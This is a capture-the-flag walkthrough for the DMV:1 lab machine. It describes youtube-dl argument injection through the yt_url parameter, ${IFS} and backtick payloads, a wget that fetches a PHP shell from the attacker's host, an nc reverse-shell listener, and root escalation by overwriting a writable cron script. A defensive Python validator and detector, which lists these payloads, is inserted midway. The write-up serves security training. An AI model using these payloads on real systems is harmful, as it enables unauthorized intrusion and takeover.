DMV:1

In this article we are going to solve another boot2root challenge, DMV:1. This is a beginner-level challenge if you know the Linux shell well.


Walkthrough


IP of the target : 192.168.43.75


First we scan the target for open ports and the services running behind them using the command: sudo nmap -A 192.168.43.75

Only two ports are open, so we decided to enumerate the HTTP service.

Okay, we have a form here that asks for a video ID to convert into MP3. We tried some random ID first, but the result was a failure, so we decided to use an actual ID (here ID means the v value in https://www.youtube.com/watch?v=ID). After providing a valid ID we get a message on the screen that says Download MP3.

So now we thought of an OS command injection vulnerability and tried some common techniques to bypass the filtering, but we failed.

Now we intercept the request after submitting any random ID in the input box and look at what the request packet looks like; maybe we can find something useful there!

We can see that the form sends a POST request that carries the ID in a parameter named yt_url.

Now we send this request to Repeater to perform more operations.

We remove everything from yt_url, replace it with "haclabs" and send the request. In the response packet there is a line "or res youtube-dl", which means that this website is using youtube-dl to download the MP3. So we searched the internet for youtube-dl and found many options we can use with it. To confirm that this really is youtube-dl we use the "--version" option.


We can see in the response packet that the version is correctly displayed! Now we can use the --exec option to execute OS commands and get a reverse shell.

So we decided to run some basic commands like id and whoami, but we failed to execute any command.

Now we analyzed the response packet very carefully and found that spaces are blocked: yt_url will not accept spaces in the string or in the command we want to execute.

In the response we can see that url_orginal contains only --exec, while the actual command we sent was --exec ls. So now we tried to run it as --exec`whoami`

and yes, we succeeded this time.

Now we tried some more commands containing spaces, like uname -a and ls -al, but we failed again because of the space. Then we remembered there is an environment variable which holds the field separator, ${IFS}, and yes, it worked! So now we decided to upload the shell to the target system using the command: --exec`wget${IFS}http://192.168.43.248/shell.php`
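The root cause in this chain is argument injection: the yt_url value reaches youtube-dl as an option rather than as a URL, and a space filter was the only control, which ${IFS} sidesteps. As an added example (not the challenge's code), this Python validator rebuilds the value into a fixed argv list with `--` before the user-derived URL, and flags the markers seen above for logging; the regexes, function names and sample values are constructed.

```python
import re
from typing import List, Optional

# Constructed allowlist: a YouTube video ID is exactly 11 chars from this set.
VIDEO_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")
WATCH_URL_RE = re.compile(r"https?://(?:www\.)?youtube\.com/watch\?v=([A-Za-z0-9_-]{11})")

def extract_video_id(yt_url: str) -> Optional[str]:
    """Return the video ID from a bare ID or a watch?v= URL, else None."""
    s = yt_url.strip()
    if VIDEO_ID_RE.fullmatch(s):
        return s
    m = WATCH_URL_RE.fullmatch(s)
    return m.group(1) if m else None

def build_argv(yt_url: str) -> List[str]:
    """Fixed option list plus the validated target; raises on anything else."""
    vid = extract_video_id(yt_url)
    if vid is None:
        raise ValueError("rejected: not a YouTube video ID")
    # A valid ID may itself start with '-', so the user value is rebuilt into a
    # full URL after "--", where youtube-dl's optparse stops reading options.
    # Pass this list to subprocess.run (no shell), so ${IFS} and backticks are never expanded.
    return ["youtube-dl", "--extract-audio", "--audio-format", "mp3", "--",
            "https://www.youtube.com/watch?v=" + vid]

def is_accepted(yt_url: str) -> bool:
    try:
        build_argv(yt_url)
        return True
    except ValueError:
        return False

# Detection side: markers worth logging or alerting on in the yt_url parameter.
INDICATORS = [
    ("option-like prefix", lambda s: s.lstrip().startswith("-")),
    ("backtick substitution", lambda s: "`" in s),
    ("${IFS} whitespace bypass", lambda s: "${IFS}" in s),
    ("$( ) substitution", lambda s: "$(" in s),
    ("command separator", lambda s: any(c in s for c in ";|&\n")),
]

def injection_indicators(yt_url: str) -> List[str]:
    return [name for name, check in INDICATORS if check(yt_url)]

if __name__ == "__main__":
    # Constructed sample request values, including the payloads seen in the walkthrough.
    for body in ["aBcDeFgHiJk", "haclabs", "--version", "--exec`whoami`"]:
        print(body, is_accepted(body), injection_indicators(body))
```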

The shell has been uploaded successfully to the system.

We run the shell using the command: --exec`php${IFS}shell.php` and start a listener on our Linux machine using the command nc -nvlp <port>, and then we have the reverse shell.

Now we looked for SUID binaries but found nothing useful, and we also checked the user's privileges with no results. So we decided to download pspy32 to the target system and run it. We observed that there is a bash script executed by root.

Now we change directory to /var/www/html/tmp/ and there we find the clean.sh file.

www-data can write to this file, so we overwrite it with a quick reverse shell.

Now we start a listener on our Linux machine, and when the bash script is executed by root we get a root shell!

We are root now, and this completes the challenge :)


© 2020 by HacLabs.